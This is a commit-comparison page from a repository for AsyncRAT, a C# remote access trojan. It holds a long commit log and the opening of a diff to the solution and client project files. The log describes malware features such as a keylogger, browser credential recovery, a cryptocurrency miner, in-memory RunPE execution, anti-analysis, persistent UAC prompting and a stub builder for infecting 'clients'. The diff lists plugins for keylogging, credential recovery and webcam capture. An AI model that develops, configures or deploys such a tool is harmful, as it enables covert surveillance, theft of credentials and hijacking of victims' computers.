Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Sapphire:v0.5.3
Branches Tags
Sapphire:master
Sapphire:v0.5.8
Sapphire:v0.5.7B
Sapphire:0.5.7A
Sapphire:v0.5.6D
Sapphire:0.5.6B
Sapphire:v0.5.6A
Sapphire:v0.5.4H
Sapphire:v0.5.3
...
compare: Sapphire:master
Branches Tags
Sapphire:master
Sapphire:v0.5.8
Sapphire:v0.5.7B
Sapphire:0.5.7A
Sapphire:v0.5.6D
Sapphire:0.5.6B
Sapphire:v0.5.6A
Sapphire:v0.5.4H
Sapphire:v0.5.3

115 Commits
v0.5.3 ... master

Author SHA1 Message Date
NYAN CAT
0f0cba4ec3 Update Settings.cs 2023-10-17 00:41:08 +03:00
NYAN CAT
547e363b68 Create UnsafeStreamCodec.cs 2023-10-16 17:20:42 +03:00
NYAN CAT
b8101babad Create NativeMethods.cs 2023-10-16 17:20:41 +03:00
NYAN CAT
9049ccc73e Create JpgCompression.cs 2023-10-16 17:20:39 +03:00
NYAN CAT
9206734f4c Update Server.csproj 2023-10-16 17:20:26 +03:00
NYAN CAT
edbcc8441c Update Settings.settings 2023-10-16 17:20:24 +03:00
NYAN CAT
68c7666dc2 Update Settings.Designer.cs 2023-10-16 17:20:22 +03:00
NYAN CAT
b340bcb22e Update AssemblyInfo.cs 2023-10-16 17:20:18 +03:00
NYAN CAT
f1507608df Update packages.config 2023-10-16 17:20:15 +03:00
NYAN CAT
fa59997117 Update HandleRemoteDesktop.cs 2023-10-16 17:20:12 +03:00
NYAN CAT
4ebf319b8c Update HandleFileManager.cs 2023-10-16 17:20:06 +03:00
NYAN CAT
c98cb7a3ea Update FormRemoteDesktop.Designer.cs 2023-10-16 17:19:52 +03:00
NYAN CAT
1aa702e67a Fixed mouse move event 2023-10-16 17:19:48 +03:00
NYAN CAT
fb31f1db99 Update FormBuilder.Designer.cs 2023-10-16 17:19:29 +03:00
NYAN CAT
a7156a7c53 Remove fixed mutex 2023-10-16 17:19:22 +03:00
NYAN CAT
570a6f201f Update App.config 2023-10-16 17:19:11 +03:00
NYAN CAT
1df3645b07 Add native api SetCursorPos for mouse move event 2023-10-16 17:19:06 +03:00
NYAN CAT
5a1da42c76 remove SQLite DLL and update Newtonsoft.Json 2023-10-16 17:18:06 +03:00
NYAN CAT
296eaaa301 Disable buggy Firefox until I update it when I can 2023-10-16 17:17:35 +03:00
NYAN CAT
a895143d30 Update packages.config 2023-10-16 17:16:46 +03:00
NYAN CAT
5937e381f9 update 
added - remote dekstop move movements
added - remote desktop showing cursor movements
added - showing active window when client connected immediately
updated - send file to disk will show if the file ran successfully or not
fixed - send file to disk fixed when executing .ps1 file
updated - UAC popup now will run until the user press accept
fixed - mutex
 2020-05-10 08:24:12 +03:00
NYAN CAT
10c995be22 update 
added - remote dekstop move movements
added - remote desktop showing cursor movements
added - showing active window when client connected immediately
updated - send file to disk will show if the file ran successfully or not
fixed - send file to disk fixed when executing .ps1 file
updated - UAC popup now will run until the user press accept
 2020-05-10 08:14:33 +03:00
NYAN CAT
565441b92a update 
fixed startup method
PlatformTarget from anycpu to x86
 2020-05-04 03:53:36 +03:00
NYAN CAT
59ea9b088b Fixed SYSTEM issue 2020-05-02 16:13:07 +03:00
NYAN CAT
abca238794 Update 
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added group to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise, you won't be able to use the new plugins
 2020-04-22 07:17:43 +03:00
NYAN CAT
dfa505e2af Update 
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added group to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise, you won't be able to use the new plugins
 2020-04-22 05:24:30 +03:00
NYAN CAT
7af20a25ba Merge branch 'master' of https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp 2020-04-22 00:53:04 +03:00
NYAN CAT
c542975a12 Update 
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added gorup to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise you won't be able to use the new plugins
 2020-04-22 00:52:58 +03:00
NYAN CAT
a21e1327eb
Update ReadMe.txt 2020-04-21 22:01:19 +03:00
NYAN CAT
1e193d7e14 Update 
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
updated plugin save method
updated runpe send to memory
minor improvements

```diff
- You need to create a new stub from this version, and then use your old version to update all your clients, otherwise you won't be able to use the new plugins
```
 2020-04-21 19:48:58 +03:00
NYAN CAT
9f2955979e Update Packet.cs 
removed xmr miner
added get active window title
updated chrome recovery
added feature change wallpaper
fixed listview when error occurred
 2020-03-26 06:48:09 +03:00
NYAN CAT
fd05091f11 update 
removed xmr miner
added get active window title
updated chrome recovery
added feature change wallpaper
 2020-03-26 06:38:50 +03:00
NYAN CAT
5224ce28f6 Update 
removed xmr miner
added get active  window title
updated chrome recovery
added feature change wallpaper
 2020-03-26 06:17:37 +03:00
NYAN CAT
f5abab2be3 Update ReadMe.txt 2020-02-26 01:04:38 +03:00
NYAN CAT
3df9f99e41 removed client CPU usage 2019-12-20 03:38:54 +03:00
NYAN CAT
3c3108ba3e fix listview issue 2019-12-20 03:06:03 +03:00
NYAN CAT
8f28aed1d3 Added flags 2019-12-14 23:06:20 +03:00
NYAN CAT
4e42abd0c3 Update FormDownloadFile.cs 2019-12-14 19:45:15 +03:00
NYAN CAT
a3c62c3335 updated receive and send socket 2019-12-14 19:38:42 +03:00
NYAN CAT
4f2fd21030 Update 2019-12-14 19:11:56 +03:00
NYAN CAT
1e9015bb5e Create ReadMe.txt 2019-12-14 19:06:06 +03:00
NYAN CAT
37ed1952e4 Update HandleWebcam.cs 2019-12-14 19:04:14 +03:00
NYAN CAT
49ed0a6441 Update HandleRemoteDesktop.cs 2019-12-14 19:04:12 +03:00
NYAN CAT
b4f275e3fb Update HandleProcessManager.cs 2019-12-14 19:04:08 +03:00
NYAN CAT
be130f4b20 Update HandleFileManager.cs 2019-12-14 19:04:06 +03:00
NYAN CAT
63b72aa0cb Update FormWebcam.cs 2019-12-14 19:04:04 +03:00
NYAN CAT
9a9249ca3b Update FormRemoteDesktop.cs 2019-12-14 19:04:02 +03:00
NYAN CAT
e36c2035e1 Update FormProcessManager.cs 2019-12-14 19:03:55 +03:00
NYAN CAT
ea18dee01f Update FormKeylogger.cs 2019-12-14 19:03:38 +03:00
NYAN CAT
3777466ff5 Update FormFileManager.resx 2019-12-14 19:03:32 +03:00
NYAN CAT
ec3b05b3e4 Update FormFileManager.Designer.cs 2019-12-14 19:03:30 +03:00
NYAN CAT
8cb80a9908 async disconnected 2019-12-14 19:00:40 +03:00
NYAN CAT
9819dfb700 fixed visit url 2019-12-14 19:00:27 +03:00
NYAN CAT
9a4b5d89f0 updated version 2019-12-14 19:00:14 +03:00
NYAN CAT
316e07e3a5 updated receive and send socket 2019-12-14 18:59:58 +03:00
NYAN CAT
d40e4c971f update xmr miner 2019-12-01 14:59:14 +03:00
NYAN CAT
d5abe868a2 update 2019-12-01 06:54:14 +03:00
NYAN CAT
83fcab04fb update 2019-12-01 06:43:06 +03:00
NYAN CAT
154f4b4123 force to close 2019-12-01 06:42:59 +03:00
NYAN CAT
c24ea61af7 send notification 2019-12-01 06:42:21 +03:00
NYAN CAT
bc19607aa5 added keyboard keys 2019-12-01 06:37:41 +03:00
NYAN CAT
f7f84aa405 added custom sleep 2019-12-01 06:36:38 +03:00
NYAN CAT
66c56e3820 force to x86 2019-12-01 06:36:17 +03:00
NYAN CAT
14641e08d1 Update Packet.cs 2019-10-16 02:34:50 +03:00
NYAN CAT
e5aedb24ca Update Packet.cs 2019-10-15 18:32:50 +03:00
NYAN CAT
19bbbb17a1 Update Packet.cs 2019-10-15 17:51:38 +03:00
NYAN CAT
d6714d54c0 #119 2019-10-15 17:25:20 +03:00
NYAN CAT
2a58c9082a Update ClientSocket.cs 2019-10-15 17:22:02 +03:00
NYAN CAT
5aabd608f7 Fixed remote desktop mouse 
Fixed remote desktop mouse
 2019-10-11 20:43:15 +03:00
NYAN CAT
8c50e4b80a Update HandleSendTo.cs 2019-10-10 09:45:05 +03:00
NYAN CAT
8fae985984 update 2019-10-10 09:36:37 +03:00
NYAN CAT
27b8305776 update 
improve bandwidth when sending plugins
 2019-10-10 08:29:53 +03:00
NYAN CAT
40e0c0cabd Update Packet.cs 2019-10-09 22:16:49 +03:00
NYAN CAT
7c8a4a3dff update 
update handle listview
 2019-10-09 20:11:21 +03:00
NYAN CAT
2480aeba99 Update Clients.cs 2019-10-09 18:02:00 +03:00
NYAN CAT
2cb311bfad Update Clients.cs 2019-10-09 17:51:06 +03:00
NYAN CAT
82d9f3b2d3 Update HandleListView.cs 2019-10-09 17:51:04 +03:00
NYAN CAT
65f60c29ff Update HandleSendTo.cs 2019-10-09 12:10:25 +03:00
NYAN CAT
ec76c92974 Update HandleSendTo.cs 2019-10-09 12:01:16 +03:00
NYAN CAT
b1416c55df Update Settings.cs 2019-10-09 10:07:51 +03:00
NYAN CAT
67ad763c1f Update Settings.cs 2019-10-09 10:07:49 +03:00
NYAN CAT
9d517e9edc update 
added HandleBlankScreen
 2019-10-09 10:04:06 +03:00
NYAN CAT
c9f6cc5429 update 
update file manager
 2019-10-09 09:43:33 +03:00
NYAN CAT
198a79d30d update 2019-10-09 08:43:08 +03:00
NYAN CAT
f302d8fdb3 Update Form1.cs 2019-10-09 08:15:28 +03:00
NYAN CAT
c5b2527e8d Update Form1.cs 2019-10-09 08:14:03 +03:00
NYAN CAT
148839d200 Update Form1.Designer.cs 2019-10-09 08:14:02 +03:00
NYAN CAT
de56a81109 Update README.md 2019-10-09 07:51:47 +03:00
NYAN CAT
800d182921 Update Settings.cs 2019-10-09 07:50:29 +03:00
NYAN CAT
40da655fcf Update Settings.cs 2019-10-09 07:50:28 +03:00
NYAN CAT
881bad54fd Update Form1.Designer.cs 2019-10-09 07:49:44 +03:00
NYAN CAT
33fe5b69a5 update 2019-10-09 07:49:20 +03:00
NYAN CAT
be5d0d5424 update 
added ping to listview
 2019-10-08 23:13:44 +03:00
NYAN CAT
39d95a7e32 Update IdSender.cs 2019-10-08 14:41:37 +03:00
NYAN CAT
bb306fd7ce update 
added installed date to listview
 2019-10-08 14:40:04 +03:00
NYAN CAT
f28103da83 update 
added builder icon and assembly cloner
 2019-10-08 13:21:21 +03:00
NYAN CAT
69ca1ee2c1 Update 
added zip/unzip to file manager
added 7zip hidden installation to file manager
added cut/paste to file manager
 2019-10-08 09:36:15 +03:00
NYAN CAT
203dda7369 update 
added block client
 2019-10-07 20:33:06 +03:00
NYAN CAT
468a9b8e7d Update 2019-10-07 11:04:39 +03:00
NYAN CAT
0824921738 fixed dpi 2019-10-06 17:54:21 +03:00
NYAN CAT
78c6cc75b2 Update 2019-10-06 11:02:41 +03:00
NYAN CAT
0d0f0792d7 Update 
fixed bugs
added miner
 2019-10-05 15:25:03 +03:00
NYAN CAT
d1b57f4291 Update 
fixed bugs
added Gzip compress/decompress for packets
 2019-10-05 12:25:13 +03:00
NYAN CAT
b57d957d03 Update 2019-10-04 09:12:30 +03:00
NYAN CAT
5a73ad3844 Update 2019-10-04 08:47:01 +03:00
NYAN CAT
b71f320fd0 Update 2019-10-04 07:13:19 +03:00
NYAN CAT
058a5d2b61 Plugins 2019-10-03 19:54:53 +03:00
NYAN CAT
feabe1307a Plugins 2019-10-03 19:54:27 +03:00
NYAN CAT
d276ddc75d added schtasks 2019-09-17 00:22:43 +03:00
NYAN CAT
9b40743212 Update HandleUninstall.cs 2019-09-17 00:22:28 +03:00
NYAN CAT
afdfc197ec Update HandlePcOptions.cs 2019-09-17 00:22:23 +03:00
NYAN CAT
4ab00f8b60 Update FormBuilder.cs 2019-09-16 13:56:22 +03:00
NYAN CAT
a85365a836 Update Anti_Analysis.cs 2019-09-16 13:47:45 +03:00
NYAN CAT
2b248abf05 Fixed windows server errors 2019-09-15 22:13:01 +03:00
NYAN CAT
b5665cc192 Update ClientSocket.cs 2019-09-15 22:12:52 +03:00
349 changed files with 19687 additions and 3661 deletions
Show Stats Expand all files Collapse all files

104
AsyncRAT-C#/AsyncRAT-Sharp.sln
View File

@ -7,6 +7,39 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csp
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Plugins", "Plugins", "{0DE8DA5D-061D-4649-8A56-48729CF1F789}"
ProjectSection(SolutionItems) = preProject
ReadMe.txt = ReadMe.txt
EndProjectSection
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Plugin\Chat\Chat\Chat.csproj", "{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Extra", "Plugin\Extra\Extra\Extra.csproj", "{424B81BE-2FAC-419F-B4BC-00CCBE38491F}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileManager", "Plugin\FileManager\FileManager\FileManager.csproj", "{BEE88186-769A-452C-9DD9-D0E0815D92BF}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeLogger", "Plugin\LimeLogger\LimeLogger\LimeLogger.csproj", "{DAFE686A-461B-402B-BBD7-2A2F4C87C773}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Miscellaneous", "Plugin\Miscellaneous\Miscellaneous\Miscellaneous.csproj", "{37E20BAF-3577-4CD9-BB39-18675854E255}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Options", "Plugin\Options\Options\Options.csproj", "{6AA4E392-AAAF-4408-B550-85863DD4BAAF}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "Plugin\ProcessManager\ProcessManager\ProcessManager.csproj", "{D640C36B-2C66-449B-A145-EB98322A67C8}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Recovery", "Plugin\Recovery\Recovery\Recovery.csproj", "{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteCamera", "Plugin\RemoteCamera\RemoteCamera\RemoteCamera.csproj", "{619B7612-DFEA-442A-A927-D997F99C497B}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteDesktop", "Plugin\RemoteDesktop\RemoteDesktop\RemoteDesktop.csproj", "{9042B543-13D1-42B3-A5B6-5CC9AD55E150}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendFile", "Plugin\SendFile\SendFile\SendFile.csproj", "{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendMemory", "Plugin\SendMemory\SendMemory\SendMemory.csproj", "{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileSearcher", "Plugin\FileSearcher\FileSearcher\FileSearcher.csproj", "{9D1D39D8-2387-46ED-A4A8-59D250C97F35}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MessagePackLib", "MessagePack\MessagePackLib.csproj", "{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@ -21,10 +54,81 @@ Global
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Release|Any CPU.Build.0 = Release|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.Build.0 = Release|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.Build.0 = Release|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.Build.0 = Release|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.Build.0 = Release|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.Build.0 = Debug|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.ActiveCfg = Release|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.Build.0 = Release|Any CPU
{6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.Build.0 = Release|Any CPU
{D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.Build.0 = Release|Any CPU
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.Build.0 = Release|Any CPU
{619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.Build.0 = Release|Any CPU
{9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.Build.0 = Release|Any CPU
{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.Build.0 = Release|Any CPU
{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Release|Any CPU.Build.0 = Release|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.Build.0 = Release|Any CPU
{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(NestedProjects) = preSolution
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{424B81BE-2FAC-419F-B4BC-00CCBE38491F} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{BEE88186-769A-452C-9DD9-D0E0815D92BF} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{DAFE686A-461B-402B-BBD7-2A2F4C87C773} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{37E20BAF-3577-4CD9-BB39-18675854E255} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{6AA4E392-AAAF-4408-B550-85863DD4BAAF} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{D640C36B-2C66-449B-A145-EB98322A67C8} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{619B7612-DFEA-442A-A927-D997F99C497B} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{9042B543-13D1-42B3-A5B6-5CC9AD55E150} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{0E423DD6-FAAF-4A66-8828-6A5A5F22269B} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{9D1D39D8-2387-46ED-A4A8-59D250C97F35} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {B9F2462F-603A-41C4-9CFC-1FAC60B4731C}
EndGlobalSection

113
AsyncRAT-C#/Client/Client.csproj
View File

@ -1,5 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
@ -31,7 +33,7 @@
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<PlatformTarget>x86</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
@ -41,18 +43,18 @@
<WarningLevel>4</WarningLevel>
<DocumentationFile>
</DocumentationFile>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
<AllowUnsafeBlocks>false</AllowUnsafeBlocks>
<GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<PlatformTarget>x86</PlatformTarget>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\Binaries\Release\Stub\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
<AllowUnsafeBlocks>false</AllowUnsafeBlocks>
<GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
<DebugSymbols>false</DebugSymbols>
</PropertyGroup>
@ -60,6 +62,9 @@
<StartupObject />
</PropertyGroup>
<PropertyGroup />
<PropertyGroup>
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
@ -72,93 +77,28 @@
<Reference Include="System.XML" />
</ItemGroup>
<ItemGroup>
<Compile Include="AForge\Video.DirectShow\CameraControlProperty.cs" />
<Compile Include="AForge\Video.DirectShow\FilterInfo.cs" />
<Compile Include="AForge\Video.DirectShow\FilterInfoCollection.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IAMCameraControl.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IAMCrossbar.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IAMStreamConfig.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IAMVideoControl.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IBaseFilter.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\ICaptureGraphBuilder2.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\ICreateDevEnum.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IEnumFilters.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IEnumPins.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IFilterGraph.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IFilterGraph2.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IGraphBuilder.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IMediaControl.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IMediaEventEx.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IPin.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IPropertyBag.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\IReferenceClock.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\ISampleGrabber.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\ISampleGrabberCB.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\ISpecifyPropertyPages.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\Structures.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\Uuids.cs" />
<Compile Include="AForge\Video.DirectShow\Internals\Win32.cs" />
<Compile Include="AForge\Video.DirectShow\PhysicalConnectorType.cs" />
<Compile Include="AForge\Video.DirectShow\Uuids.cs" />
<Compile Include="AForge\Video.DirectShow\VideoCapabilities.cs" />
<Compile Include="AForge\Video.DirectShow\VideoCaptureDevice.cs" />
<Compile Include="AForge\Video.DirectShow\VideoInput.cs" />
<Compile Include="AForge\Video\IVideoSource.cs" />
<Compile Include="AForge\Video\VideoEvents.cs" />
<Compile Include="Algorithm\Aes256.cs" />
<Compile Include="Algorithm\Sha256.cs" />
<Compile Include="Handle Packet\HandleBlankScreen.cs" />
<Compile Include="Handle Packet\HandleBotKiller.cs" />
